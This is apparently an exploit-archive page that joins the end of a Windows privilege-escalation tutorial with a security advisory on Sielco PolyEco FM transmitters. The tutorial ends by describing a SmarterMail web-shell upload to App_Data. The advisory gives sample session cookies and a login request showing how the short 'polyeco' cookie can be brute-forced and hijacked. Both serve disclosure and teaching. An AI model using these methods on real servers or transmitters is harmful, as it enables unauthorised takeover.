also it can be a "Binary Permissions " vulnerability. " " Sometimes also it can be a "Weak Service Permissions" vulnerability. " " Sometimes also it can be a "Unquoted Service Path" vulnerability. " " Our limits are as much as our imagination... " " *** 0DAY *** " " Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. " " We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. " " TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] " " Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] " " As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, " " And then upload our shell file to the server by bypassing it. " " This way, we will have full control over both the server and the mail service. " " Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] " " " ========================================================================================================================================== </code></pre>

<pre><code> Sielco PolyEco Digital FM Transmitter 2.0.6 'polyeco' Session Hijacking Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19 Summary: PolyEco is the innovative family of high-end digital FM transmitters of Sielco. They are especially suited as high performance power system exciters or compact low-mid power transmitters. The same cabinet may in fact be fitted with 50, 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, 1000). All features can be controlled via the large touch-screen display 4.3" or remotely. Many advanced features are inside by default in the basic version such as: stereo and RDS encoder, audio change-over, remote-control via LAN and SNMP, "FFT" spectral analysis of the audio sources, SFN synchronization and much more. Desc: The Cookie 'polyeco' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and manipulate the transmitter. The session is also visible in an HTTP GET request and there is the lack of SSL in use, allowing MitM attacks. Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5763 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5763.php 26.01.2023 -- # Session values (len=5) Cookie: polyeco=23770 Cookie: polyeco=12397 Cookie: polyeco=54689 ... # GET request for login (user:1234) http://RADIOFM/login.cgi?user=user&password=c494fe7ab21e23e456a89d5a09828a10&id=14810 The hash = password + id = 123414810, md5(123414810) = c494fe7ab21e23e456a89d5a09828a10 Once authenticated, Cookie: polyeco=14810 </code></pre>